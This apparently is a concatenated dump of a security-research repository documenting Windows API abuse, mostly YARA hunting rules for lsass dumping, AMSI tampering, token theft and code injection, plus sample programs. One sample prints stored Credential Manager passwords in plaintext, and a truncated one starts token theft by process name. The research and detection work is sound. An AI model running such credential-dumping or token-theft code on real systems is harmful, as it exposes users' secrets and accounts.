| // Set console output mode to UTF-16 (Unicode) 10 | if (_setmode(_fileno(stdout), _O_U16TEXT) == -1) { 11 | // Attempts to set the locale based on user's environment 12 | setlocale(LC_ALL, ""); // Attempt to set locale from environment 13 | } 14 | 15 | PCREDENTIALW *creds = NULL; 16 | DWORD count = 0; 17 | 18 | // CredEnumerateW enumerates credentials. 19 | // The second parameter (Flags) should be 0 for common enumeration. 20 | if (CredEnumerateW(NULL, 0, &count, &creds)) { 21 | wprintf(L"Found %lu credentials:\n\n", count); 22 | 23 | for (DWORD i = 0; i < count; i++) { 24 | wprintf(L" TargetName: %s\n", creds[i]->TargetName); 25 | wprintf(L" UserName: %s\n", creds[i]->UserName); 26 | 27 | if (creds[i]->CredentialBlobSize > 0) { 28 | if (creds[i]->CredentialBlobSize % sizeof(wchar_t) == 0) { 29 | wprintf(L" Password: %s\n", (wchar_t*)creds[i]->CredentialBlob); 30 | } else { 31 | wprintf(L" Password (raw bytes, size %lu): ", creds[i]->CredentialBlobSize); 32 | for (DWORD j = 0; j < creds[i]->CredentialBlobSize; j++) { 33 | wprintf(L"%02X ", creds[i]->CredentialBlob[j]); 34 | } 35 | wprintf(L"\n"); 36 | } 37 | } else { 38 | wprintf(L" Password: (none/empty)\n"); 39 | } 40 | wprintf(L"\n"); 41 | } 42 | CredFree(creds); 43 | } else { 44 | // Didn't work 45 | wprintf(L"CredEnumerateW failed. Error code: %lu\n", GetLastError()); 46 | } 47 | return 0; 48 | } -------------------------------------------------------------------------------- /DBGHELP/MiniDumpWriteDump/MiniDumpWriteDump.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_MiniDumpWriteDump_Usage 6 | { 7 | meta: 8 | description = "Detect suspicious use of MiniDumpWriteDump: dynamic dbghelp usage + dumping indicators (lsass, .dmp, GetProcAddress for MiniDumpWriteDump). Requires multiple signals to reduce false positives." 9 | date = "2025-10-26" 10 | reference = "Windows API Abuse Atlas — MiniDumpWriteDump" 11 | 12 | strings: 13 | /* direct symbol names */ 14 | $s_mini = "MiniDumpWriteDump" ascii wide 15 | $s_dbghelp = "dbghelp.dll" ascii wide 16 | $s_getproc = "GetProcAddress" ascii wide 17 | $s_loadlib = "LoadLibrary" ascii wide 18 | 19 | 20 | $s_createfilew = "CreateFileW" ascii wide 21 | $s_writefile = "WriteFile" ascii wide 22 | 23 | /* dump file patterns */ 24 | $s_dotdmp = ".dmp" ascii wide 25 | 26 | /* target process names commonly dumped (lsass) */ 27 | $s_lsass = "lsass.exe" ascii wide 28 | 29 | /* optional: flags and common PoC strings */ 30 | $s_minidump_flag = "MiniDumpWithFullMemory" ascii wide 31 | 32 | condition: 33 | (uint16(0) == 0x5A4D and // PE file 34 | filesize < 10MB) and 35 | ( 36 | ( $s_mini ) or 37 | ( $s_getproc and $s_dbghelp and $s_loadlib) 38 | ) 39 | and 40 | ( 41 | $s_dotdmp or 42 | $s_lsass or 43 | $s_createfilew or 44 | $s_writefile or 45 | $s_minidump_flag 46 | ) 47 | } 48 | -------------------------------------------------------------------------------- /NTDLL/RtlCreateUserThread/RtlCreateUserThread.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_RtlCreateUserThread_Usage 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects dynamic resolution and usage patterns of RtlCreateUserThread" 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | 12 | strings: 13 | $load_ntdll = "LoadLibraryA" ascii wide 14 | $load_ntdllw = "LoadLibraryW" ascii wide 15 | $get_proc_address = "GetProcAddress" ascii wide 16 | $ldr_get_proc_addr = "LdrGetProcedureAddress" ascii wide 17 | $rtl_create_thread = "RtlCreateUserThread" ascii wide 18 | $ntdll_dll = "ntdll.dll" ascii wide 19 | 20 | // Common function hashes or export parsing strings (example hashes as hex strings) 21 | $hash_func_call = { 8B 0D ?? ?? ?? ?? 33 C0 39 0D ?? ?? ?? ?? } // sample pattern for hash calculation (example) 22 | $export_table_walk = "AddressOfNames" ascii wide 23 | $export_table_walk2 = "NameOrdinals" ascii wide 24 | $export_table_walk3 = "AddressOfFunctions" ascii wide 25 | 26 | condition: 27 | ( 28 | ( 29 | ($load_ntdll or $load_ntdllw) and 30 | ($get_proc_address or $ldr_get_proc_addr) 31 | ) and 32 | $rtl_create_thread and 33 | $ntdll_dll 34 | ) 35 | or 36 | ( 37 | $hash_func_call and 38 | ( 39 | $export_table_walk or 40 | $export_table_walk2 or 41 | $export_table_walk3 42 | ) 43 | ) 44 | } 45 | -------------------------------------------------------------------------------- /NTDLL/DbgUiRemoteBreakin/DbgUiRemoteBreakin.yar: -------------------------------------------------------------------------------- 1 | // WARNING: THIS IS A SLOW SIGNATURE!! 2 | 3 | // Heads up: These rules are loosely scoped and designed for hunting and research. They’re not meant for production detection systems that require low false positives. Please test and adjust them in your environment. 4 | 5 | rule Possible_DbgUiRemoteBreakin_Abuse { 6 | meta: 7 | description = "Detects potential abuse of DbgUiRemoteBreakin for stealthy code injection or anti-debugging" 8 | author = "Windows API Abuse Atlas" 9 | 10 | strings: 11 | // API strings 12 | $dbgui_str1 = "DbgUiRemoteBreakin" ascii wide 13 | $dbgui_str2 = "DbgUi" ascii wide 14 | 15 | // Common shellcode patterns 16 | $shellcode1 = { 60 9C ?? ?? } // PUSHAD, PUSHFD pattern 17 | $shellcode2 = { 68 ?? ?? ?? ?? 9C } // PUSH addr, PUSHFD pattern 18 | 19 | // Related API strings often used together 20 | $rel_api1 = "CreateRemoteThread" ascii wide 21 | $rel_api2 = "VirtualAllocEx" ascii wide 22 | $rel_api3 = "WriteProcessMemory" ascii wide 23 | 24 | // Anti-debug checks 25 | $debug1 = { 64 A1 30 00 00 00 } // MOV EAX, FS:[30h] (PEB access) 26 | $debug2 = { 80 7? ?? 00 } // CMP byte ptr [reg+offset], 0 27 | 28 | condition: 29 | uint16(0) == 0x5A4D and // PE file 30 | ( 31 | // Main detection logic 32 | ($dbgui_str1 or $dbgui_str2) and 33 | 34 | // Additional indicators 35 | ( 36 | 2 of ($shellcode*) or // Multiple shellcode patterns 37 | 2 of ($rel_api*) or // Related APIs 38 | any of ($debug*) // Anti-debug routines 39 | ) and 40 | 41 | // File properties 42 | filesize < 10MB // Limit false positives 43 | ) 44 | } -------------------------------------------------------------------------------- /KERNEL32/LoadLibrary/LoadLibrary.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_LoadLibrary_Usage 6 | { 7 | meta: 8 | description = "Detects potentially malicious use of LoadLibrary (dynamic resolution, injection patterns)" 9 | author = "Windows API Abuse Atlas" 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | threat = "Potential code injection / reflective loading / DLL sideloading" 12 | 13 | strings: 14 | // Direct API names 15 | $LoadLibrary = "LoadLibrary" ascii wide 16 | $GetProcAddress = "GetProcAddress" ascii wide 17 | $CreateRemoteThread = "CreateRemoteThread" ascii wide 18 | $WriteProcessMemory = "WriteProcessMemory" ascii wide 19 | $VirtualAlloc = "VirtualAlloc" ascii wide 20 | $VirtualProtect = "VirtualProtect" ascii wide 21 | 22 | // Obfuscated / split LoadLibrary strings often seen in malware 23 | $obf1 = "Loa" ascii 24 | $obf2 = "dLib" ascii 25 | $obf3 = "rary" ascii 26 | 27 | condition: 28 | uint16(0) == 0x5A4D and // PE header 29 | filesize < 2MB and 30 | ( 31 | // Suspicious combos: LoadLibrary + GetProcAddress (dynamic imports) 32 | ($LoadLibrary and $GetProcAddress) or 33 | 34 | // Classic injection chain: LoadLibrary + CreateRemoteThread + WriteProcessMemory 35 | ($LoadLibrary and $CreateRemoteThread and $WriteProcessMemory) or 36 | 37 | // Memory allocation + LoadLibrary together (often reflective loaders) 38 | ($LoadLibrary and $VirtualAlloc and $VirtualProtect) or 39 | 40 | // Obfuscated references like "Loa" + "dLib" + "rary" 41 | all of ($obf*) 42 | ) 43 | } 44 | -------------------------------------------------------------------------------- /AMSI/AmsiScanBuffer/AmsiScanBuffer.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_AmsiScanBuffer_Activity 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects suspicious dynamic resolution or tampering with AmsiScanBuffer and related AMSI functions" 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | 12 | strings: 13 | // AMSI related API names and DLL 14 | $amsi_scan_buffer = "AmsiScanBuffer" ascii wide 15 | $amsi_scan_string = "AmsiScanString" ascii wide 16 | $amsi_initialize = "AmsiInitialize" ascii wide 17 | $amsi_open_session = "AmsiOpenSession" ascii wide 18 | $amsi_close_session = "AmsiCloseSession" ascii wide 19 | $amsi_dll = "amsi.dll" ascii wide 20 | 21 | // Common APIs used to patch/hook AMSI in memory 22 | $virtual_protect = "VirtualProtect" ascii wide 23 | $nt_protect_virtual = "NtProtectVirtualMemory" ascii wide 24 | 25 | // Strings related to dynamic API resolution often used by malware 26 | $loadlibrary = "LoadLibraryA" ascii wide 27 | $getprocaddress = "GetProcAddress" ascii wide 28 | 29 | condition: 30 | uint16(0) == 0x5A4D and // PE file 31 | ( 32 | // Dynamic resolution of AMSI APIs 33 | ( $loadlibrary and $getprocaddress and ( 34 | $amsi_scan_buffer or $amsi_scan_string or $amsi_initialize or $amsi_open_session or $amsi_close_session 35 | )) 36 | or 37 | // Presence of amsi.dll and memory protection APIs indicating possible patching 38 | ( $amsi_dll and ( $virtual_protect or $nt_protect_virtual )) 39 | ) 40 | } 41 | -------------------------------------------------------------------------------- /NETAPI32/NetRemoteTOD/sample.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | class Program 5 | { 6 | [DllImport("Netapi32.dll", CharSet = CharSet.Unicode)] 7 | private static extern int NetRemoteTOD(string UncServerName, out IntPtr BufferPtr); 8 | 9 | [DllImport("Netapi32.dll")] 10 | private static extern int NetApiBufferFree(IntPtr Buffer); 11 | 12 | [StructLayout(LayoutKind.Sequential)] 13 | private struct TIME_OF_DAY_INFO 14 | { 15 | public int tod_elapsedt; 16 | public int tod_msecs; 17 | public int tod_hours; 18 | public int tod_mins; 19 | public int tod_secs; 20 | public int tod_hunds; 21 | public int tod_timezone; 22 | public int tod_tinterval; 23 | public int tod_day; 24 | public int tod_month; 25 | public int tod_year; 26 | public int tod_weekday; 27 | } 28 | 29 | static void Main(string[] args) 30 | { 31 | string serverName = null; 32 | IntPtr bufferPtr; 33 | 34 | int result = NetRemoteTOD(serverName, out bufferPtr); 35 | 36 | if (result == 0) // NERR_Success 37 | { 38 | try 39 | { 40 | TIME_OF_DAY_INFO todInfo = Marshal.PtrToStructure(bufferPtr); 41 | TimeSpan uptime = TimeSpan.FromSeconds(todInfo.tod_elapsedt); 42 | 43 | Console.WriteLine($"System Uptime: {uptime}"); 44 | 45 | if (uptime.TotalHours > 5) 46 | { 47 | Console.WriteLine("The system has been up for more than 5 hours."); 48 | } 49 | else 50 | { 51 | Console.WriteLine("The system has been up for less than or equal to 5 hours."); 52 | } 53 | } 54 | finally 55 | { 56 | NetApiBufferFree(bufferPtr); 57 | } 58 | } 59 | else 60 | { 61 | Console.WriteLine($"NetRemoteTOD failed with error code: {result}"); 62 | } 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /KERNEL32/CreateFileTransacted/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() { 5 | HANDLE hTransaction = CreateTransaction(NULL, 0, 0, 0, 0, 0, NULL); 6 | if (hTransaction == INVALID_HANDLE_VALUE) { 7 | printf("Failed to create transaction. Error: %lu\n", GetLastError()); 8 | return 1; 9 | } 10 | 11 | HANDLE hFile = CreateFileTransactedA( 12 | "C:\\Temp\\stealthy.txt", // File path 13 | GENERIC_WRITE, // Desired access 14 | 0, // Share mode 15 | NULL, // Security attributes 16 | CREATE_ALWAYS, // Creation disposition 17 | FILE_ATTRIBUTE_NORMAL, // Flags and attributes 18 | NULL, // Template file 19 | hTransaction, // Transaction handle 20 | NULL, // Reserved 21 | NULL // Extended parameters 22 | ); 23 | 24 | if (hFile == INVALID_HANDLE_VALUE) { 25 | printf("Failed to create transacted file. Error: %lu\n", GetLastError()); 26 | CloseHandle(hTransaction); 27 | return 1; 28 | } 29 | 30 | const char *data = "This file is created inside a transaction.\n"; 31 | DWORD bytesWritten; 32 | WriteFile(hFile, data, (DWORD)strlen(data), &bytesWritten, NULL); 33 | 34 | // Uncomment this to commit the transaction (make changes permanent) 35 | // if (!CommitTransaction(hTransaction)) { 36 | // printf("Failed to commit transaction. Error: %lu\n", GetLastError()); 37 | // } 38 | 39 | // Uncomment this to rollback the transaction (discard changes) 40 | if (!RollbackTransaction(hTransaction)) { 41 | printf("Failed to rollback transaction. Error: %lu\n", GetLastError()); 42 | } 43 | 44 | CloseHandle(hFile); 45 | CloseHandle(hTransaction); 46 | 47 | printf("Transaction complete. File changes %s.\n", 48 | /*(committed ? "committed" : "rolled back")*/ "rolled back"); 49 | 50 | return 0; 51 | } 52 | -------------------------------------------------------------------------------- /NTDLL/NtSystemDebugControl/NtSystemDebugControl.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | import "pe" 5 | 6 | rule Suspicious_NtSystemDebugControl_Usage 7 | { 8 | meta: 9 | description = "Detects binaries that contain strings and API usage patterns consistent with attempting to resolve/call NtSystemDebugControl or related SYSDBG commands. Intentionally tight to reduce false positives (requires BOTH debug-related strings and dynamic API resolution + privilege indicator)" 10 | author = "Windows API Abuse Atlas" 11 | date = "2025-10-11" 12 | 13 | strings: 14 | // direct target API and commonly abused SYSDBG helpers (ASCII + wide) 15 | $NtSystemDebugControl = "NtSystemDebugControl" ascii wide 16 | 17 | $support_SysDbgReadVirtual = "SysDbgReadVirtual" ascii wide 18 | 19 | $support_SysDbgWriteVirtual = "SysDbgWriteVirtual" ascii wide 20 | 21 | // physical-memory device path often targeted by low-level tooling 22 | $support_PhysicalMemory = "PhysicalMemory" ascii wide 23 | 24 | // dynamic resolution + common privilege string — require both to make rule tighter 25 | $GetProcAddress = "GetProcAddress" ascii wide 26 | 27 | $support_SeDebugPrivilege = "SeDebugPrivilege" ascii wide 28 | 29 | condition: 30 | uint16(0) == 0x5A4D and 31 | // Require evidence of dynamic resolution (GetProcAddress) AND at least one 32 | // debugger/kernel-debug related string. Also require a privilege or physical memory indicator 33 | ($NtSystemDebugControl and $GetProcAddress) 34 | and (any of ($support*)) 35 | 36 | } 37 | 38 | rule imports_NtSystemDebugControl { 39 | meta: 40 | description = "Detects binaries that import NtSystemDebugControl" 41 | author = "Windows API Abuse Atlas" 42 | date = "2025-10-11" 43 | condition: 44 | pe.imports("ntdll.dll", "NtSystemDebugControl") 45 | } -------------------------------------------------------------------------------- /USER32/LockWorkStation/sample.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | void changeWallpaperToCyan() { 7 | // Wait to ensure the lock screen is active 8 | std::this_thread::sleep_for(std::chrono::seconds(5)); 9 | 10 | HKEY hKey; 11 | 12 | // Step 1: Set solid background color (R=0, G=255, B=255 -> Cyan) 13 | if (RegOpenKeyExA(HKEY_CURRENT_USER, "Control Panel\\Colors", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { 14 | const char* cyanRGB = "0 255 255"; 15 | RegSetValueExA(hKey, "Background", 0, REG_SZ, reinterpret_cast(cyanRGB), strlen(cyanRGB)); 16 | RegCloseKey(hKey); 17 | std::cout << "[+] Background color set to cyan.\n"; 18 | } else { 19 | std::cerr << "[-] Failed to set background color.\n"; 20 | } 21 | 22 | // Step 2: Disable image wallpaper and use solid color 23 | if (RegOpenKeyExA(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { 24 | const char* empty = ""; 25 | const char* style = "0"; // 0 = Center (doesn't matter for solid) 26 | const char* tile = "0"; // No tiling 27 | 28 | RegSetValueExA(hKey, "Wallpaper", 0, REG_SZ, reinterpret_cast(empty), strlen(empty)); 29 | RegSetValueExA(hKey, "WallpaperStyle", 0, REG_SZ, reinterpret_cast(style), strlen(style)); 30 | RegSetValueExA(hKey, "TileWallpaper", 0, REG_SZ, reinterpret_cast(tile), strlen(tile)); 31 | 32 | RegCloseKey(hKey); 33 | std::cout << "[+] Wallpaper disabled. Solid color will be used.\n"; 34 | 35 | // Apply the changes 36 | SystemParametersInfoA(SPI_SETDESKWALLPAPER, 0, NULL, SPIF_UPDATEINIFILE | SPIF_SENDCHANGE); 37 | } else { 38 | std::cerr << "[-] Failed to update wallpaper settings.\n"; 39 | } 40 | } 41 | 42 | int main() { 43 | // Run background thread to change wallpaper 44 | std::thread worker(changeWallpaperToCyan); 45 | 46 | // Lock workstation 47 | if (!LockWorkStation()) { 48 | std::cerr << "[-] Failed to lock workstation.\n"; 49 | } 50 | 51 | worker.join(); 52 | return 0; 53 | } 54 | -------------------------------------------------------------------------------- /KERNEL32/WriteProfileString/WriteProfileString.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | /** 6 | rule WriteProfileString_Abuse_Processes 7 | { 8 | meta: 9 | description = "Detects suspicious WriteProfileString API usage by monitoring known abusing processes" 10 | reference = "Windows API Abuse Atlas - WriteProfileString" 11 | 12 | strings: 13 | $WriteProfileString = "WriteProfileString" ascii wide 14 | $powershell = "powershell.exe" ascii wide nocase 15 | $wscript = "wscript.exe" ascii wide nocase 16 | $rundll32 = "rundll32.exe" ascii wide nocase 17 | $cscript = "cscript.exe" ascii wide nocase 18 | 19 | condition: 20 | uint16(0) == 0x5A4D and // PE file 21 | filesize < 10MB and 22 | $WriteProfileString and 23 | any of ($powershell, $wscript, $rundll32, $cscript) 24 | } 25 | **/ 26 | 27 | 28 | rule WriteProfileString_API_Call 29 | { 30 | meta: 31 | description = "Detects potential embedded WriteProfileString API calls in binary code" 32 | reference = "Windows API Abuse Atlas - WriteProfileString" 33 | 34 | strings: 35 | $apiA = "WriteProfileStringA" 36 | $apiW = "WriteProfileStringW" 37 | 38 | // Suspicious section or key names 39 | $sect1 = "MicrosoftUpdate" 40 | $sect2 = "Loader" 41 | $sect3 = "Config" 42 | $sect4 = "Settings" 43 | $sect5 = "RunKey" 44 | $sect6 = "Startup" 45 | 46 | // Encoded or obfuscated-looking data 47 | $base64 = /[A-Za-z0-9+\/=]{20,}/ nocase 48 | $hex = /[0-9A-Fa-f]{20,}/ 49 | 50 | // Unusual file paths 51 | $tmp_path = "\\\\?\\C:\\\\Users\\\\.*\\\\AppData\\\\Local\\\\Temp\\\\.*\\.ini" nocase 52 | $hardcoded_ini = /[A-Z]:\\\\[^\\]+\\\\[^\\]+\.ini/ nocase 53 | 54 | condition: 55 | uint16(0) == 0x5A4D and 56 | filesize < 5MB and 57 | (1 of ($api*) and 2 of ($sect*,$base64,$hex,$tmp_path,$hardcoded_ini)) 58 | 59 | } 60 | -------------------------------------------------------------------------------- /FWPUCLNT/FwpmEngineOpen/sample2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // Dummy callout GUID (replace with your real one) 7 | DEFINE_GUID( 8 | CALLOUT_GUID, 9 | 0xaabbccdd, 0xeeff, 0x1122, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0x00 10 | ); 11 | 12 | int main() 13 | { 14 | DWORD result; 15 | HANDLE engineHandle = NULL; 16 | 17 | // Open a session to the filtering engine 18 | result = FwpmEngineOpen0( 19 | NULL, // local system 20 | RPC_C_AUTHN_WINNT, // authentication service 21 | NULL, // auth identity 22 | NULL, // session 23 | &engineHandle 24 | ); 25 | if (result != ERROR_SUCCESS) { 26 | printf("FwpmEngineOpen0 failed: %lu\n", result); 27 | return 1; 28 | } 29 | printf("WFP engine opened successfully.\n"); 30 | 31 | // Prepare filter conditions 32 | FWPM_FILTER_CONDITION0 condition = {0}; 33 | condition.fieldKey = FWPM_CONDITION_IP_REMOTE_PORT; 34 | condition.matchType = FWP_MATCH_EQUAL; 35 | condition.conditionValue.type = FWP_UINT16; 36 | condition.conditionValue.uint16 = 21; // FTP port 37 | 38 | // Prepare the filter structure 39 | FWPM_FILTER0 filter = {0}; 40 | filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4; 41 | filter.displayData.name = L"FTP Filter - Redirect Placeholder"; 42 | filter.action.type = FWP_ACTION_CALLOUT_TERMINATING; // Requires a callout 43 | filter.action.calloutKey = CALLOUT_GUID; 44 | filter.filterCondition = &condition; 45 | filter.numFilterConditions = 1; 46 | filter.subLayerKey = FWPM_SUBLAYER_UNIVERSAL; // Built-in universal sublayer 47 | filter.weight.type = FWP_EMPTY; // Default weight 48 | 49 | // Add the filter 50 | result = FwpmFilterAdd0(engineHandle, &filter, NULL, NULL); 51 | if (result != ERROR_SUCCESS) { 52 | printf("FwpmFilterAdd0 failed: %lu\n", result); 53 | FwpmEngineClose0(engineHandle); 54 | return 1; 55 | } 56 | printf("FTP filter added successfully.\n"); 57 | 58 | // Close the filtering engine handle 59 | FwpmEngineClose0(engineHandle); 60 | printf("WFP engine closed.\n"); 61 | 62 | return 0; 63 | } 64 | -------------------------------------------------------------------------------- /NTDLL/NtImpersonateThread/NtImpersonateThread.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | import "pe" 6 | 7 | rule NtImpersonateThread_Token_Chaining_General 8 | { 9 | meta: 10 | description = "Detects NtImpersonateThread used with other token manipulation APIs (possible privilege escalation)" 11 | reference = "windows-api-abuse-atlas" 12 | strings: 13 | $impersonate = "NtImpersonateThread" ascii nocase 14 | $duptoken = "DuplicateToken" ascii nocase 15 | $setthread = "SetThreadToken" ascii nocase 16 | $openthread = "OpenThreadToken" ascii nocase 17 | $revert = "RevertToSelf" ascii nocase 18 | condition: 19 | uint16(0) == 0x5A4D and 20 | filesize < 10MB and 21 | $impersonate and 22 | ($duptoken or $setthread or $openthread or $revert) 23 | } 24 | 25 | rule NtImpersonateThread_Thread_Creation_Chain 26 | { 27 | meta: 28 | description = "Detects NtImpersonateThread used with thread creation APIs (possible lateral movement or escalation)" 29 | reference = "windows-api-abuse-atlas" 30 | strings: 31 | $impersonate = "NtImpersonateThread" ascii nocase 32 | $createthread = "NtCreateThread" ascii nocase 33 | $createthreadex = "NtCreateThreadEx" ascii nocase 34 | condition: 35 | uint16(0) == 0x5A4D and 36 | filesize < 10MB and 37 | $impersonate and 38 | ($createthread or $createthreadex) 39 | } 40 | 41 | rule NtImpersonateThread_TokenTheft_Chain 42 | { 43 | meta: 44 | description = "Detects token theft via NtImpersonateThread, SetThreadToken, OpenThreadToken, and thread manipulation APIs" 45 | reference = "windows-api-abuse-atlas" 46 | strings: 47 | $impersonate = "NtImpersonateThread" ascii nocase 48 | $setthread = "SetThreadToken" ascii nocase 49 | $openthread = "OpenThreadToken" ascii nocase 50 | $suspend = "SuspendThread" ascii nocase 51 | $resume = "ResumeThread" ascii nocase 52 | condition: 53 | uint16(0) == 0x5A4D and 54 | filesize < 10MB and 55 | $impersonate and 56 | $setthread and 57 | $openthread and 58 | ($suspend or $resume) 59 | } -------------------------------------------------------------------------------- /NTDLL/RtlCreateUserProcess/RtlCreateUserProcess.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | import "pe" 6 | 7 | rule RTLCreateUserProcess_LowFalsePositive 8 | { 9 | meta: 10 | author = "Windows API Abuse Atlas" 11 | description = "Low-FP rule for binaries that import RtlCreateUserProcess or a tight combo of native process-creation helpers from ntdll.dll" 12 | 13 | condition: 14 | uint16(0) == 0x5A4D and 15 | not (pe.characteristics & 0x2000) == 0 and /* prefer executables; DLLs often legitimately export/import many native helpers */ 16 | ( 17 | /* direct import of the explicit native API (strongest single-signal) */ 18 | pe.imports("ntdll.dll", "RtlCreateUserProcess") 19 | or 20 | /* composite signal: both a process-parameters helper and a section-creation helper imported from ntdll */ 21 | ( 22 | pe.imports("ntdll.dll", "RtlCreateProcessParametersEx") and 23 | pe.imports("ntdll.dll", "NtCreateSection") 24 | ) 25 | ) 26 | } 27 | 28 | rule RTLCreateUserProcess_ResolverPattern 29 | { 30 | meta: 31 | author = "Windows API Abuse Atlas" 32 | description = "Detects potential dynamic resolution of RtlCreateUserProcess: resolver imports + embedded symbol or ntdll reference" 33 | date = "2025-10-19" 34 | 35 | strings: 36 | $RtlCreateUserProcess = "RtlCreateUserProcess" ascii 37 | $s_ntdll = "ntdll.dll" ascii 38 | $s_getproc = "GetProcAddress" ascii 39 | $s_loadlib = "LoadLibraryA" ascii 40 | $s_loadlibw = "LoadLibraryW" ascii 41 | $s_ldrget = "LdrGetProcedureAddress" ascii 42 | 43 | condition: 44 | uint16(0) == 0x5A4D and 45 | pe.is_pe and 46 | ( 47 | /* one of the resolver imports exists */ 48 | pe.imports("kernel32.dll", "GetProcAddress") or 49 | pe.imports("kernel32.dll", "LoadLibraryA") or 50 | pe.imports("kernel32.dll", "LoadLibraryW") or 51 | pe.imports("ntdll.dll", "LdrGetProcedureAddress") 52 | ) and 53 | $RtlCreateUserProcess and 54 | (any of ($s*)) 55 | } -------------------------------------------------------------------------------- /RASAPI32/RasEnumConnections/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int main(void) { 7 | DWORD dwSize = sizeof(RASCONN); 8 | DWORD dwConnections = 0; 9 | DWORD dwRet; 10 | 11 | // Allocate buffer for connections 12 | RASCONN *lpRasConn = (RASCONN *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize); 13 | if (lpRasConn == NULL) { 14 | printf("Failed to allocate memory.\n"); 15 | return 1; 16 | } 17 | 18 | // Must set dwSize of first structure in array 19 | lpRasConn[0].dwSize = sizeof(RASCONN); 20 | 21 | // First call to RasEnumConnections 22 | dwRet = RasEnumConnections(lpRasConn, &dwSize, &dwConnections); 23 | 24 | if (dwRet == ERROR_BUFFER_TOO_SMALL) { 25 | // Reallocate to required size 26 | HeapFree(GetProcessHeap(), 0, lpRasConn); 27 | lpRasConn = (RASCONN *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize); 28 | if (lpRasConn == NULL) { 29 | printf("Failed to allocate memory.\n"); 30 | return 1; 31 | } 32 | lpRasConn[0].dwSize = sizeof(RASCONN); 33 | 34 | dwRet = RasEnumConnections(lpRasConn, &dwSize, &dwConnections); 35 | } 36 | 37 | if (dwRet != ERROR_SUCCESS) { 38 | printf("RasEnumConnections failed with error %lu\n", dwRet); 39 | if (dwRet == ERROR_INVALID_HANDLE) { 40 | printf("ERROR_INVALID_HANDLE: No RAS connections found.\n"); 41 | } 42 | HeapFree(GetProcessHeap(), 0, lpRasConn); 43 | return 1; 44 | } 45 | 46 | if (dwConnections == 0) { 47 | printf("No active RAS connections found.\n"); 48 | } else { 49 | printf("Active RAS Connections: %lu\n\n", dwConnections); 50 | for (DWORD i = 0; i < dwConnections; i++) { 51 | printf("Connection %lu:\n", i + 1); 52 | printf(" Entry Name : %ws\n", lpRasConn[i].szEntryName); 53 | printf(" Device Name: %ws\n", lpRasConn[i].szDeviceName); 54 | printf(" Device Type: %ws\n", lpRasConn[i].szDeviceType); 55 | printf(" Handle : %p\n\n", lpRasConn[i].hrasconn); 56 | } 57 | } 58 | 59 | // Clean up 60 | HeapFree(GetProcessHeap(), 0, lpRasConn); 61 | return 0; 62 | } 63 | 64 | // define WinMain so the linker stops complaining 65 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, 66 | LPSTR lpCmdLine, int nCmdShow) { 67 | return main(); 68 | } -------------------------------------------------------------------------------- /ADVAPI32/CreateProcessWithTokenW/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | BOOL GetProcessTokenByName(LPCWSTR targetProcName, HANDLE* outToken) { 6 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 7 | PROCESSENTRY32W pe = { .dwSize = sizeof(PROCESSENTRY32W) }; 8 | 9 | if (!Process32FirstW(hSnapshot, &pe)) return FALSE; 10 | 11 | do { 12 | if (_wcsicmp(pe.szExeFile, targetProcName) == 0) { 13 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe.th32ProcessID); 14 | if (hProcess) { 15 | HANDLE hToken; 16 | if (OpenProcessToken(hProcess, 